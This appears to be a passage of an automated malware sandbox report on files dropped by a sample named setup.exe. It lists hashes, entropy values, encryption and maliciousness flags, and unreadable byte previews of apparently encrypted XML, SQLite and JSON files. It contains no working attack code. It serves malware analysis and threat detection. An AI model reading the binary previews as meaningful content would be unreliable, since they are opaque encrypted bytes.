              SHA-512:8347B8FE3A987A9622A024EA0CCA7C1D21E95230A34E43A487F6EB2A0E242EA8FBECDBEC6FAA0621818692F6D1572595641818A05A534AD6EFF6B8318296E109
              Malicious:false
              Preview:<?xml.5 I..*fE...t@....=.6e.....6M....*..u...]v...Qp..z.M.7..h.J.w..u4I.$.mm..z...,..wF.;...%/.[...4t..B...%.?.....Z~.....-...R."...x.EB.T...i.VF../..wHJ|....B...o.v..'....{..r.....!.oZ....6..s>Pp....}{.y.S..h!.R.......b\a..L..:(....YS.B.oe.Q.....'*vw7.l.j..p..-...........3.].S./.c$]P.ES5X|#..%..'!.,Z.\r.2..1.C{...j.+b)K......X/ncQ..V..,.A..n8.(.c....^*P..u.vm.2.vF].K.L..<Q-.O..........'.U".....$z.G~...t.1O.rw.Y6.T+.....fp"=.%....j.y%D..e.k.I....V..`..SNn;....F-..V..-......<T.....W.c...s~h-&.a.......M>t;.4. ..M}m..4.h.e........<.HW..8[.NF......Gs......G..O+.*E.0...Bst1.W....<qb.SU.......ix.G5.^2..}.@.J...k)}~".V.k.0.%j....r..=......@n .Y.FM.k...[...j....9.m).,.@..x...\d..M..G.#-....y .m=[..g.......'7...lb._.%.Y..Q..,.D..JY..'...r}.2.[Z~2k..9`...[..:.....V$.......-.A.'6Q.1....v'........@N.w...r...;.w....wu.=...:o*.Uu....?<...6...te....._..6..6~......I.2!..-...P...Rw....;./.../g.[.o.n.....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):871
              Entropy (8bit):7.7809737043916805
              Encrypted:false
              SSDEEP:24:ifpwclTtObjc70/cXwYLGJUOHn7WqYjbD:ipJMbY70/CjGJJ7WqY3D
              MD5:3CFD68BE7B9944E311864270BAAEE000
              SHA1:1B74D2744CBC6124A7C174F46514D1B24F88EA57
              SHA-256:039D612217B2020AB75243B26244810CB0CE9CC9EFE3D999F879ACE0B987FB49
              SHA-512:1BCA7503D7B3C9842506B1D5BCAFE4EAF4966A5EB2EF7E02C861E47F8E80BDA1E4865C746A09C63D8B29C59B5E6409C595CC7EA01A0CD5E0689F34FA8801A9DC
              Malicious:false
              Preview:<?xml.T.]..v.t..zg..g..)d._Ig..HC..//.z....7m.lw..-............#-..-w.9..-j......v..4$..5_"......b...X./..)...f.G.....3..u.:..-.B.C.~Z.R.z@.m..E.c..y..t8x....l.p..X..+k`t|d._.V.6./O..U.v.O.)(.o....&..6......pn..FL...G+..`._~.<9#e._+.f.......l..,.,........\......d8.F.?..{pPy......1.G.+..(.a:.p:1$....c..V=.T0"...#..t.;..;....5..=-r.)}'c.^.#........9.B.....lH.P...SI.X..|.&<7..R:.H.'......4....U...ozl@...G..=......M.).....I......<j4...X.[s*cG......h.5Z:.....'.N.&.x.l...O..{g.j.st..!W.m.$$.^G ..Ld...@..Vm....~GY..$.j\U.,.;*...dU....:..'..(g.....ZDi.............Y6G..1.x.4..........?W......`....uY.....;z.i.X....*qsr.t>.F.2..7\2S=i...B.`....+`...n....X.Q.{O%.w........].A..s.e..%U)...)..| .....nM.]..k.w..G.j..;).F......9...i... .8......6..U..s>...".@Z<VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2217
              Entropy (8bit):7.911809692165027
              Encrypted:false
              SSDEEP:48:fvIwpnPGWWu4qf/9L4vD94HrOdQGcfn6v6aPBT/MSmD:fvpRMux9L4fdxcfNaJ/3+
              MD5:4B9BB838EBDA3CE0B638979AD929EAC2
              SHA1:2F1B6B4E7EC73FB4ADD25C2E54225DD16ACA55E3
              SHA-256:D4A4CFD2FB3BB23BCCFD9DF5C799AAF8017E9993C68CD5AF92DC38AC5AE91D9A
              SHA-512:DF80AF49F4A7D561DF5E568CA8F3DD1B8AC08589590E7275F5D4292942E503081A5DAD9CABB03321B0EE118D667F757133A6FD0973F8EC53009CE57FD453E4E4
              Malicious:false
              Preview:<?xml.....Dp&..E.r.*9[{.....<..V"a..P....u.........]&....+..N.Hh...q$w ..#.'......;...m....9t...{)...=..s..[.H.R..4...0...............9.g+ .u/t.^.u.s3.J.L}f...X.4...DU.?..Db.4.j.P'......b.........t!...i~..oQ.....@..T.].u .....}....e..P].q.=?.E.. .$[p%.tQqR....x&.T;....."...x.cV.W..t.N..|;-*Q.mA..-..._....)XI.T.....V-4.Y.O....vI.t....(M....tT...!.^.0..n....k..`...$..8........D.".....U>.......G`L.|H..YA...=)...q#..#,..g...;..|.n.h....^>.+r...T.Q....C.$Y......g.DC.M".....K.. .L.hxm..p|UA..dY.L.:...NL/...77.*.u..:.l3..1..N..n$t+.@......[.r..>r.=.#..:.......W..{.(........tBha.}..eR..........@0N .`.....p....[7.....O..v..7g.....o..=.F,...R.....Ij.@m....?....r.:.6..j....^......PU..|.h..S$..8|e.&^Y..&.W..\..<..U..?}if.b.X8..c..&...=...q.G2q.."|.p.pD.1...L.6..o.q$....t..)t...S&j'/.c4B.0;.<....)..37.......6..`..Z.#..=/.ye.f....._g..R..D..k.g=./.+jn..G.He[..>...&7...5..J...v#.^=..u..K.F.cjKYY<..[.Z"q....R.Q........Z!."a.,...0^z.....P...1......q.a|..w..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1987
              Entropy (8bit):7.904458746726005
              Encrypted:false
              SSDEEP:48:yFHexMm+MJy1/Gw+fMqVCZXr4N2KopEpPnD:yFHeb+MU1uw+zsXr4N2ML
              MD5:C2662F7033C5CB52259882B90F12F252
              SHA1:EB206586BEBA88EC0309191636665477B13FAD26
              SHA-256:1B763500ACCB2EB9DB38D5237D38524CA36F339F356D27A78A71975C24AC35D3
              SHA-512:6E8950D83209993F074DBD287F5EDEE9CFDBFD4DEFF490015788DF91C20802FD8B5FBF363EBB9049FC54922AC15C5B26F03BCB6E6D62ACBFD1EE46201B5D1B1E
              Malicious:false
              Preview:<?xmlf...n.ro.iM.....{...5... .N^...'...............|l^.......*|x.aCd.......X.+.........U..=.....4k.ti.vFo......&.?%..5..8n.......9U....{.....HA.h.<.u.PY....X....l...7.1.t....!.O..5o...O.<.>.K......8..QS..!;.....G.b.......`!.nw5Y..si....X..S....[..=<....2/w.j.$_......4.Dz.....o#~.L...eR.....&.....7......?..../.L<.,.'.....~.+.ql.......`\@WU..sh..../L....E.'.3.4\%....g.3...M..I......y.........l.u.N."v...QC.m...8....%a.."......F;k9.g.:.CN^G.J'....N......A.RR}...%...n..%Q..q..l..2.)(XG.a.........#..-.....a..0E<.sA...2(c.......`.\tu Ywb.]..=.1....E.Ro0...?Lb...."..0v.I.....=N...}(|...5^.&t..=.J...4Sy..*..&,.)K`m.....E$.|-.+...p.aF.......q..k.MI..Z-.8t}(U..V..8j..\...A.U./W?.X......fB\6.CE\.|.u....TU....z1(G...D.M....J....+...iD.qR.....!..B.7.;Q..hL......7..^`./............EE...r.2.{................j|=..7k.LS.....72C?.S._@..G.;.o........3.~B]........9.0O7..Z..3yS.lp....%...5v.j:......vw.BF.O.;+@....Gl..]J"2....)..m.A..7Yt.V.Q..j...?^.u.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3851
              Entropy (8bit):7.949068207600913
              Encrypted:false
              SSDEEP:96:iE+WpjF68tv/kqnVTSC+HzDbz+6Z6dXBgwR55nBcMiKrILR:iE3pI8tv/kCTSCGPmdSwRJxiK81
              MD5:1780F4AB3AF110A8F24824BEA59F97B3
              SHA1:0FDB7185BF7CEAC31F85F3F4A2C7F2187E5BE197
              SHA-256:4764CD87286FD5A6CE09EA44D075374F735BEC46D344D7D8DEF395A3B64A47F4
              SHA-512:790B5667E3F5FF585C8E8554AD44AF1A4807BE69764013438820B277985A4144359C2C92179D33107354E1FBF5D8F59FCC6BE3E35C8BD54D81808CB1AA4B8A5A
              Malicious:false
              Preview:<?xmlp.G.{.-.J...w...fV..9.dx...N.8.......$.n.K.G.n.....G6W...wlXy..}....Q.zn..`.!...P...p%.10..\p.f..O}.ows\..`...L.m...R....=..G...U.......En..c.-..#...........<Cf.w...n.._.1......D.....}....m.x.....).B...7..%.3$.`..W5..(g].J....i+.^+.z.....o(..z..3o...8.Zx..#f.6.s.P.O..*..F1&..2ZB\........t..g%.....>(......x.8.A....u.uI^..]:$.D:$..6.)..')).$...........f..*..L..<....\=.......= .n>....b.5....c...i.4..A......fSY>.JR..o^..b2.w..EoR&.?....q...C..9......p~...z.3.Ow...L#,.S.!..m.'...*%.....sh.=.......{._.K.Q.a,.......n...|..~...%3....f..z,..2."..Y......G..8I0.].z2...V.0.Z.......(.\....2$.R.a.@.b.$..F=..<y./.A...<.......^.M,.]...&.6.W.0,..X.CS.j.~.S.,L...1.&~o..-#.`..J6..I....a....U....{%.Y,..l....Z"7......&..Y.U...J.....gN.P........Q.....'...... `"...E;t\/f.p.K.G...D. Y....tXk...b...#%..k1{....&Gc=...F..1.<3.Pq.T..7{..t.P..-..EU..\EZ..me.=.1...,Y@...x........60?.[.."(.!.Z%..A..:7.....`.C.g..T.j..b..gx..-L...@...:...^+*o.X.W......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3223
              Entropy (8bit):7.93470910744076
              Encrypted:false
              SSDEEP:96:0aQuDcsjqIhGFmvpq3F5U6jPmD2oHMDr0ntqR:BQu1jqeZBwUqXoM+IR
              MD5:6A5EE848121795086A1EB0EA0DFAC2DF
              SHA1:8F9CFF34302537222E84ECC3737D43DFFB638562
              SHA-256:343FF8831CE45053E6233A3DD848316C1AECC75ED0E8DE25E02B2DFFF9BC03DE
              SHA-512:523350AFCB1E64AD324B203BA36874AFC417ACFADD4FFC1DDB91813119B210A357FAA8FA5C36726A821B7323FFE784906E862B57C84A49F5743C77EED00B5148
              Malicious:false
              Preview:<?xml...Q...i(.61...1..u k.o.B1...]......&...Pf.S.._.7.YY............?...E.(.4..M....~."'k.].5.$.g.jk\...?.......Ai...von..Y.....P]...Uv..N....}.:.Gq_u....En".7..S2..4.d%{Wa.V..K...E.NA.)M.Zx.D.*.$E...,....K..,...G"m.X.......S...2..b|.P..".tk..n.-...5.??I$...{.'.c....'.Sh.ID....?@.~......z.3J....w.X330....;..W.I......Y*..d......U}........a....d.;z../.rr.$...k..PZ..mD....B.>.<.4*.<i.../xd.1..*n.R...y.[..r.+......&I...'.GA..V....v..V......~.R9....G...)..Z;.c.K.j.....l.....1.Z..T....=x|E.d....:$...x.o=q.cL.+.`..Mm...#.Bb...2U...C7.i...`.a."%A...n..6Ei..-q..|..a.>....,...*..........8q...x...e].....6=\q..h.~.....(.c5._V.&..&+fW#.){.a?iT...6O.=p.r..J8.....ca....O!...y.g`.T.....Sj.w....Y_.#.G....~..q..?....-~X....*Z.w0D.}w..Z..aR[....c.......C.J.v.*.....P9Y......Z4C8Y.....mC7...T.h....G..sC..w!M..%RD.....:.`..7.bk...;f.Sp...!.....NNA.d?M.....k.f.5.B....C**.6..m...N.\4...I...V..o. ./....:....'..r..R.w.n.L...l...T..6.>f.@0....h.s7oT...c.t..UC..|.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):361051
              Entropy (8bit):6.515948371635592
              Encrypted:false
              SSDEEP:3072:HhQorpIYMJJT4e1X2YUnyL0dlMwNj/kE0olP+RXxOydoO1ggktH6AfW:BQwpIYUJT4e1XMyLEMoDklQ+COgtHhe
              MD5:820070E94A9FA3FA9B00517BA467F1C7
              SHA1:03B046969D220E12C0E3DF2F2A83F9891BB5C0F4
              SHA-256:DF8A1D985E1CD244CF6E6EE58D208131A9AA7404C37EA201741AE2F77868C1CC
              SHA-512:31B22D455A61F373C1F6EF4A5203E4E02C375C11F49F720FFA44450A65B201CB0E3378F6B0A7AB83683366E05626896310C8F4C0B9E737822143B779E3412D51
              Malicious:false
              Preview:<Rule....."~D.......iJ(...02r.W..dJ...O.....2.UWF..:.>.$.6..~.A.....s.<..Z.`..R...u.....i...jT.p.G.;<|.....%XI..1...L.x...i\....~.....v..H..=.7:.l/e<.......r..~.i.........}.....8...Y..I...!E...4..SG..@.a....H...z..W.u._K.l:..d'e..z..!..;.y..{.......5...{.H.......*.X"..s....h.J!...O0..S.Z.[.gr;W~1......=..].....Q...@..|Z.(q...V8.....]Z.*.....]1..s..*.L...........M.H!m..e.Wb.../.#>..Cx.>.y...a.e]......".j....w..Wm. ...........O.h.oN.".\..c...d..Ik.x..........n..9.v..|...m..P.nu..$.d.S..`...3. .m|...."m/.2u.T.......t.v....g"..v5@5|3....Sgm.).oL1.g....^.>..l..5.z.Lxi@.ag..,. Q*.G5..._.&?3.1.w.M...g=....>..x.x...)#..(.....9...(....W....@g...x.?.(...P.Oey.(.....2..\.(...@.v;.....Y...\.....+.....5|).=..1/cC.....9G<Qy......U...YeWM........GqW6.L..)...QP....{.N..;.....!e.X.`.......x;.(J^.~...n..........'..^........f0..*.G..z-....Z..........?...|..\A.l....|s....._A.h_;..k.....L..]5..Y.z...g....r.....w0VYE..l7?...\...f.@,..;..'b.ta...x.......'.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):361051
              Entropy (8bit):6.5141883687217215
              Encrypted:false
              SSDEEP:3072:v4kvWZL7zV+NSNi7x4uBpvukkCGNGAq8dtRepAKZsElPTCTsYwXC:Jv4PzVESw7xFzvuaIGxMtkwEl2os
              MD5:4DEF00520D39EFEA9A501AB2FC36ADF6
              SHA1:76A2D22B0071C06018081BCA1BA48BD1AA2143C5
              SHA-256:17D951476BA402FBBF6143C564F9A9EEB2570E3E97782FD79B034560222455A1
              SHA-512:86366ABBA0D0ED045A6256FA996396353C4846C3120E862145103D481C8889D75CECF6CD0D69DB5EA5DFC3E894B8C23AFB62C91E656C973ABFCC6E33BAF738A5
              Malicious:false
              Preview:<Rule.....K.~.Io..^f..&X.........-.*l..k.H..u..P..C..r..y3...+..=./].c.zP..iYF.Q..^.....$.r.........#..2..~..}R./.....6.c.P..^.... ..L..B...../...1....JC5uN..Z..'...F....8.`..Z.....z....1n.$;...7.....R:b.Q....".......9 ..hZ....J@......n.Dr...\.l6....9.;.A.r.K.I.....9.c.&(...x%.j...K......u..]0.d9J|...$.O.....r.6..4..%]R..2.ZZ^....'^-U..G..#...{L.!......8.G...N..u....8....v../,'.....^...+......|..*..Cu|..J...&.. .i..n...._BZZ.B.=>Kp.4vK._l......W..#k.0..T.>..x.3...3...9...h..u.......}...u..W6<..V.......~dB...J.^.1[1.4..VLL.'.4..f.f.C../=.{.=..O.j.r>..N*.~.z#dV.yW..,........O...PL...".N....?.}....v.E. .....|....BG.L.....<.&......&.(9..L....w?.y1.../.#...B.:.\.O{.;`.>..........Y.?n.."O......$.l].O.Q.....t...)..k....1.m....R...&.hX..ul.qgP....6..Th........3.2.....5 .?2..Q.Hr&.h.....<.N.'...xSu]Z.p.H...?.[....&..]6..y....Q$...k\..)..v&E;.Ik?.S].)F....K@-(...+......U.....T........s....1.hd..!}u......7%..5;...(.....-...`t....tUw.`.eA
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1098
              Entropy (8bit):7.803923103716841
              Encrypted:false
              SSDEEP:24:sjQNS5bk9Iu7DQFDI9w/0oe0u3ijOFAFbD:sjQNS5bQI+DQrtNQED
              MD5:80473F0194DF16A297E9545E8C49C90B
              SHA1:64F24F390A319F12522884603456A4A492DC2CB7
              SHA-256:E25071632D357B548F43324082545F7A4186CF3946B1BEC35B3EAD098CC946E3
              SHA-512:B922E273272CABE3E61EC1BAAFB6D44FA19A9F2A695E11B114E0346CFBD701453029608A7EFB732F77B202A4C4C62FCB3FA38B8CC671CD00D16A365DA62D3AD8
              Malicious:false
              Preview:3.7.4......g#&o$......j9$.2.%...cC.W.8...f.h.i.!`.........1.Kw.=0].....c...$...Qd........;"..^..i...>.jE..7./.y...m......%....M..|.9....H...q<zW[.tf.......2.......).....)..........a).e....Fp`....`..A..'..../.!.............X..h..YB......<!..l.vnm..:.....O-...V<.$..3B...&v..4c....P...........|b.z..*f.4E...P.....f0`G...!..*hC.........|...Fe..+...b.lZ....8.{..\-..Q../.....?EW5Z.UY...7..a......".....E.M............:h(4.9.l6.p.&[.....?......|...M.....(....:G........0E.......F.@Z......#..k..Tl.$.-.....M."...+E.....U.L...)6.........E.n.1._;..8..4r.....M.....eW>G..{..e...$.4..:2...u(..>y........"\..,..{O..}......w.yZ..go.O.I...~.!........u..I....8.a.Pg..e-....k.Z..|..e"....GO...`...j...+.z...Ss...@..A.............`..i).....nt..$..=..&......q1iE...qI.._......:....P..0.......+.DdNK?..].B.u.d....O..........[7v4O....QD...*....<k...Z.G.3...l...G.\.,....9.WtI.O.Y..-......z.........Wt+..L...u.3.De.M..H?u...I]...3Tx.q....).?.|......`...z..A...L...P.....p.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.992460537129121
              Encrypted:true
              SSDEEP:384:QQegQNvQ7yZDcxBa3IFe90Xb4NXqAALp+pTh4rhSb16a8QRG6b1ZEwmE:QQegCls+Iw0KXqAALp+f4rha8CGgZEzE
              MD5:353362F1C58CC701573E581A64D436FB
              SHA1:8D14F97095527A5F1F2B4B10584A2C8B03FAC49A
              SHA-256:AA00D937E20F49D9189B498507F55918E3435BC5B436F92735CD9A9E3B3377DB
              SHA-512:CAE21C241717F571E8CD578B498C0E6B7B3798B90544678D61B1FF07BC795F9C79E2639F6954AB5B6D2CD859FA7B3E6911A6FBE34D97F76B0A4C685C7D858E03
              Malicious:true
              Preview:SQLitl...Du.r....v.jt...ZGn..HP.2D.Z....m.s.I.[....#@<t...[.CA.Z.p~4W\..x.&..<C.......y@.".g..U.O].Wi. f.x..H.=......v*.....?......a.."..s.....i.R.&MWV.Wp.C.F...:.]...'-"...#gsSK....c.'pW.p......fy....H........Ci.".......sA....N>...-..._[0.......og...&....0..'.y.........}.F....C9.!.........L..d..L..[.......t...B...k.,.?..{..L....&..Z@W.1.n.(.3.....t..W.h0.U..f%?z..i..W....t.....,.W....Y.Bp.!j6+D...p...C=.lT&........3.o.......:..I.'..K.....5.N.o.o..)eP.1*.*3...n...*.?."............~...8u.1..V...9........|.v.^.....^.Y.......4VaX$t..G^4.^.........{.BP\..../.q..y0ngfu{.[.NJ....>..VH.W..>E...5..a.HH.,.V5..E.&....*.....%.*..NI.l..o.......:.h.%.....M*1.P.LT..DN0s.......k. .....g.a.1.....U..P..Ly|.....C..\1~3`.].d..u.H.*.S..C..iP...^..J....|.w.(8s.fM......UL~I=..(..HCm......:...1.....z. ....{..5...GG..5.7...k~...ed.c..N...I.9s.N'i......1.>...D...q....."s).p.. 1..|on'.`8....D...C..<-.......<0^.&.....t.7....)&.J../...[M..../.WV.........f.j.O.cM.[
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.992220235076175
              Encrypted:true
              SSDEEP:768:slhof4+5dQYSCHve8TPtNd4pPf9dIIO8/Vf9z0xVoOV:whEfdxSMeu3SPldFV/Vf9z+
              MD5:86FF608806B6641DD0FFA9E832C4E2E3
              SHA1:F045A36DB9FA27D2A3F9720F8E90614CC6CE17E0
              SHA-256:951DF22C00DFAFCC15D3915F2BD397E11D1061F2AA5C8B4899D679D38C31AC3F
              SHA-512:5FDA40298828221C43396A590CA4AD29934695BCF22ED8F87B6AAAC2B7B19508801F75A7745B76AF7567657797F677CAA1ACA8AC8484AECCB1C1D9CA24D15DFD
              Malicious:true
              Preview:SQLit.d.^..*......u..z.E.......I...h.q@......h|..O..+..6<.y.:......M....%:u..tSu...R.l.*..&K.........N.d ..X*bt..A.....y..8..x......{...........Vy.C...%N.t.oT..=....>....a&Qt.q..}7.\.t\...L....&.6.._ot.4.b..%v.....$Q...g..&..gB5...#..Y.%....l..M7.........}yq.O:r.lf.p...]%|-..$...6.1.1..j...q.^x.w#..T...2.. ;.!P......F.H.f..,..s.P2.c...2.S...{..0.k..H..`.}U9..w...zV...........b+..w..O.2.e......TX|.h..P...\......cc.P.gx....$.....Un......|lZ$#.m. %.+..m.I^.U}..8.Of....G*......o....'.7M..H<lv.Oe`...l1..9M.M^.b.....&..d;......._......+..L....;.G....SP...lVdxK.Qm.=.@..J>./..~.0.z.^r..F ..`l..+a"..|.....).xaM....j./...M,aZ..E......c.f.C..+.O}.4../#..qn.....KK..D..T+...#>.7.W.].\{.8.hvm..P.j.\..f...~.7lCd.3.&...&......|..a.......k...M.c.*o.~M./!N+Te1...L.G@..1....E...j...Q..\.....Y.....t.j.)q..1...."t.;...D.f.]..r..6R...e..y..p...D>:.W.h.4..f/..s.......e......]..\..M..E.NXs..&.)Q.xn....y.Q.?.}.M5/4..Xu.XS^e...fR.^a..D...Ml.t.XX....@1.Mmf.3.3...._.v.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.992899696038577
              Encrypted:true
              SSDEEP:384:VfvEWIr2Ss2Z9IecevLATrumOA9Oak0c970P9s5RV8tyxT2np+4CNti5:VfvEMUZm9umOAQ0I70W5RV8tjpoNu
              MD5:53E6AF0E5342BD1DF7181906D4153EC0
              SHA1:A866A2358BA7854B983B1B9FDB71AF05E5D6D139
              SHA-256:76E85621EC223D6C38DDB9D4F98DB7D6A883979A22C958F4DCAC3BF631E6DDF8
              SHA-512:EBB081BE5336D1984D0E4BC2598BAE953E0CF1342389F6D937909748B0E317AA617A965BD4B3F2C35E8EEFF0CEA4048AD4A73DF8061BEBF19B6E05CCF646185D
              Malicious:true
              Preview:SQLit.d.1./...~..:w.zlSR....(...`...[... 4..R.-....H.)(..}5.....]......l.g...N...9..A$....u(....1.=;#.e..,/.'...n..nOy.......5h..r}.. .|...|.....?D....7'..4...8....RPN..i..;.MZ&...).N.h..7[..:u..B.3.'..s.?.........'@....G.KC..|.N.B;..y..~....3.35W.....Nea6U..ZBg.#o.A...[e.f.._:A.....0@2..d>.8..&.....:.Z....0...vx....y....>./}4{ .../+.m.`../)f..2.......<..g&..=#&&.D.VdP........>......:t...0S.|..4>.:.....G.=..Y...Oz.M$."IOz....i.s....C>..S.-.}_m.=........H.3M..........C..x..n.........#....!../.5J.......(M..].f..[o.V.I.).L.9t....vNP..<..}.x..YNeG....]....c.^?.(..$..+Un..b..U..C .......!m...T...J..n...v@.B0..... .#.jtm..s.R.|....s...|.....2QZ5..Ym.5 . ..@Ty..7.7...]....a.?.]n...L.7V.......$.^..g.R..M;.<;..p..l9I....gu-h.W... ..\.>J.h....r..n5......w.e.j..G....sfm;./.[...XM.gT2...i~. pp.1...tbD>...mF.?...L(.:.WEF...RZ...T2.....Xn<...d.....K.....s.....Y..).]s,&a..g.R&o7A.Ic.x.uRa..A.:UP....f,..z..............[..{.(Y.uu.0.7Y.U...G.X..I..d..(
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.992196420352433
              Encrypted:true
              SSDEEP:384:kFpCxzPSQ/cwB+0MdV0ZG4O1xIsIQsi14wiUUB5kMzkLWc5EocwKCt9NMByHLtWL:kbGSQ/fB8bmsbL/w2eKEojhfMByHL3Ba
              MD5:8022EA4B8CAF102FE0518102947044C6
              SHA1:8CAF531DBFA14828822CA003F2294ED2BC116A66
              SHA-256:A2AE1858AECA508FC9D5F8064CB38C92CC8DA2BC8E97A5D0193290DFA4757A09
              SHA-512:0D55E5B7FEAB5BDF3F9DFEA5DDB20C7706E1CCD163E279DB3F19945EF4DDEE7B1529DC575E0751AB50472C7763CC74EAF191E7F0CB2EC80934E234495F19ADAA
              Malicious:true
              Preview:SQLit..u..=.s...u..Yg.....N.w.......B..)..q'..U.I......m.e.=\+....\..b<..W.c,>.j.._...E.....8..wz....9....c...'P@. +._.......d1.)...o../.....&.S...u..Nx........G...<.? .........h...Q.J..q.4.r.....:.x.e].z...F..z{..Y..&...\.p|...7.mL.....d.7m....Z... .u.Q..m..4AWZy. ~....:.SDH..~..l.1.].....j.oC..4..S.{...&...../...k.3...i..=..E?....O....$f..N...G...m......6u:v.)......r...jX.K.+kn!6t....q%..._..$...Bm.b...../....N....}.n.....~.5.=.b..YC....d.=....O...|.T2.o.*zxxa&Y....p.1.......i&..p/......1m.o...B....V..^..n...&gp2o4...wqIR.Ns..0. q~.^...$$+0.....E.V0m.!.:........I&.l1']a}.#@...oj...7X.coN.|..x...*....t..3.jt!.f..|....\...M".w...".[@....60.x...`...7..w....$.,.sn....hT..o.?....c0...2......o.(y.i.}B.P.{$..jvY..qsd....0..j....Ha&..PK.&._f.Z..{...-R#[..w.v..{VG..{&..%...P.bN...R.4..12s....u.K..4...._.3?i(...gOe;R.Sw.O.a9...E#..@T>..R%.bg.M..Y..r........%.5.mU.{....&..yV....y-.).......z......F{.i1.!`Z..\..;..H_..a.. ..9
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2612
              Entropy (8bit):7.92189275653537
              Encrypted:false
              SSDEEP:48:KIFy/WE4p96xqeqUippT4Vmx0+f/wyqTz0RgMdOyV9x/KE+JFDD:jBEu6MBFuA0+f/wjTzk/vUEWP
              MD5:E760B269B56E7B20850CDCA09B8E42CA
              SHA1:F0EF7E3B5CFC1C2D6FDF67F3B571D0AFBFB8A1BE
              SHA-256:6E1F019E66D8E024B2ED21537A72DFC2E8542F2A570C6AB02ADC228DCF78552D
              SHA-512:52813D25D06F712931C21BC5BF4D74F7C41367E51141C10C40C2ABFDED4DC1B6E0A3DCC95D3CF7B63D7CFBA573D6F99A057246FABD483EF320C44F2BB4E1216B
              Malicious:false
              Preview:{.".T6ftV.j.......a5.4...[~P........`.'5...bd..<...i8..ljE..u..\..r..@./m3n....h....a..Y.z2...Z.CU/...{8....$.D..........&.Bi..m(.3..q.9C.h..F..(.>0c+...'....SQ5:..D]x.c.;.>1).c......m..ps..R(.{.....G.\..-|-B..?.o.K2...V.=..5.B.}.q....]....i.,.NSD...?r........'.Y...|..v..@.r..}...}-........:...i...i.d.HXw=1...95Y|..n.b.c.E,./.`.F.*P...A.fA.64..C..e..e....O.VRd.W..FN.?M.9...7.PP...r._.......r.O..?...xV.....P-K...U.lZ....". ..$.y...^..{.n.p.@V.,...1.`....#.h...".]...Q....]......)7.#.#..G.\...<.k.sJ.H.m...v....>.#...:G>4Q..mW..k....7..[....d.^..k..:...,."P.K"......?(M.X.\.k./:.9....$g{....E.eX.E._......Nf..?V.0.b!3R....m.(1gI%...mb.n.[&.J.gFz4.N.-..B.A..v..zaE....^"..G.@<.#.....Rf.C<....o...~..G.f.p..G...1.....^..=...=.~.b.64.....5.?...V......(a/E..T..,:.d....9!aT<.s.2.....,nM....Y*..O...r...\\Ap...w.V{K.wgN...a;;^54.z....u..:..)......(A..2KC..T8.*.(...%..d+...o........v.X .U.\._./.4.{.z....k.7.1...Z.g{....~H.xV...6.NK|`sc..<0........
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2612
              Entropy (8bit):7.930093369882589
              Encrypted:false
              SSDEEP:48:VB3HXyjxhi7KavV+8tWFvkGb0t6jWt2ss9/Tc+ALvOjsXK1Pb8ZetRqIRTJMeD:VR8wV+gWFvkU0t0Wvsh67bX105x
              MD5:A637F44B5D49E71F331F4FF6E68B94DE
              SHA1:73B289EE0DCA9F06EAEF50C61783AEA422C1B188
              SHA-256:DA2B266B9BA8479278EDFEB2619F96553453FC4E6015265A9A90241300E1AEBC
              SHA-512:B07E32F0AD025DE6E21D5ACF27C90FBF9B078BE096D5839C6FBB7C0BB120F13D26E38AD2CE88B2F3AC7C951E115FEA8F9C192CAD032AC8AE427C646867F82499
              Malicious:false
              Preview:{.".T..)hT.,/.Ob.z..f..sJ.....,.X.........gp..J,.".)`...l,l.....zE6..1...K.......*#....#...H...M.G.-....U_.m.B~.c..>.I.0"^.T.<....S.KKa......O+.6..8....S...B4&..a.]X.....a....(..j,.....Q...E..cT..8y..CC.14mz~*.e...eU..r.Y}}_UP..p8{....d..}....l..*......;l.H_..2.......&....T..Q..1.kn..Yj..`8.....5......+|vZ..?0......5.+...FPoB......K...!.$..3...y.......6....7...UVu.dm.....8 ...D[Q/...1......#[U].............%.(.v.5I.o^.Q0..f.(..y.a......n1G|..y.<.`..%.R......W..c.......Va...\.....E....<..m.w,B$|.%t..#S0..!......J....+...7..p..x.)XVy.zz..c.O..+..z........h....G..za).*HRf....7...:..K.J..Ar. .. .n...m..........m............i.X\... .s...sJ....$..*.&.lU.s..b..n..1c....v...k0.i..b..Uv.R|...!...z.<.B..(...a..'.&m...].i/K.u...g.f.=&/S..my.....|_...N.....L.0.M..4.$K U't....J.i.t..f.........+..d.L]..wG.F.r..@...D.F..).......n.Y..0f..v...^:..`....w...e0~.DPwQ...............A_4.|..k.]P...X..#.5."."V..x.,g$....DB......`.e.uY..."@...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3018
              Entropy (8bit):7.93654225517178
              Encrypted:false
              SSDEEP:48:B485aNUELsYYO7UTetmoGLSimSzEMNB3qAENXCCK/s1JgPslkRTWD:hLELFtBtmo7SzEMNlqJNSN0LgI
              MD5:F58C89BD7B62CCCAA8FF52E85B42500C
              SHA1:5F8B49481DFF44A629A42485C82DE8F1F31E783D
              SHA-256:F20C0E0D7C1936623CA7FF481A37B692BB71DB5846E0562E4BA223A4D5FD2808
